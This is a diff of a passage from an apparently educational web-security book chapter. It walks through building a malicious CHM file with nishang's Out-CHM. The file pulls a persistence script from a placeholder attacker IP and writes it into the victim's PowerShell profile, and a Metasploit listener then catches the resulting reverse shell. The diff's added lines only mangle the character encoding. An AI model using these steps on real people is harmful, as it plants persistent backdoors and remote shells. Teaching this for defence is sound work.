holisticinfosec/HolisticInfoSec-For-WebDevelopers-Fascicle1/manuscript/markdown/main/chapter7.md

 {icon=bomb}
 G> before doing the same thing when running the `doc.chm` we create below.
 Both `Persistence.ps1` and `EncodedPersistentScript.ps1` gave me problems initially.
 It turned out that the actual file encoding of both files was not right.
 If you just copy either of the files from your Windows attack VM to your hosting directory on your Kali Linux VM, you may have the same issue.
 I ended up creating a new file in the hosting location and copy->pasting the file contents into the new file, which worked successfully.
 The first part of the error from `IEX` in ISE for `Persistence.ps1` was:
 G>
-G> `The term 'ÿþf u n c t i o n ' is not recognized as the name of a cmdlet, function, script file, or operable program.
+G> `The term 'Ã¿Ã¾f u n c t i o n ' is not recognized as the name of a cmdlet, function, script file, or operable program.
 Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
 At line:1 char:19`
 G>
 G> For `EncodedPersistentScript.ps1` it was:
 G>
-G> `The term 'ÿþp o w e r s h e l l ' is not recognized as the name of a cmdlet, function, script file, or operable program.
+G> `The term 'Ã¿Ã¾p o w e r s h e l l ' is not recognized as the name of a cmdlet, function, script file, or operable program.
 Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
 At line:1 char:23`
 G>
 G> See the funny characters?
 That's what gave it away.
 G>
 G> We now create `doc.chm`, or what ever you want to call it, informing `Out-CHM` that we want the payload of `doc.chm` to be the script ([`EncodedPersistentScript.ps1`](#EncodedPersistentScript-ps1)) we just created and hosted.
 When downloaded and invoked, it will persist the contents of [`persistentFetchRunPayload.ps1`](#persistentFetchRunPayload-ps1) in its encoded form to the PowerShell profile that belongs to the user who opened `doc.chm`.
 Run the following commands to create `doc.chm`:
 G> `PS C:\Source\nishang\Client> Import-Module .\Out-CHM.ps1`
-G> `PS C:\Source\nishang\Client>Out-CHM -PayloadURL http://<listener-attack-ip>/EncodedPersistentScript.ps1 –HHCPath “C:\Program Files (x86)\HTML Help Workshop”`
+G> `PS C:\Source\nishang\Client>Out-CHM -PayloadURL http://<listener-attack-ip>/EncodedPersistentScript.ps1 â€“HHCPath â€œC:\Program Files (x86)\HTML Help Workshopâ€`
 G>
 G> Next, we setup our Metasploit listener, ready to catch the reverse shell when our target runs  `doc.chm`.
 We use the same `powershell_msf.rc` resource file that `psmsf` created for us in the [PowerShell Exploitation with Psmsf](#powershell-exploitation-with-psmsf-play) play above.
 G> Start your listener using the `powershell_msf.rc` resource rile: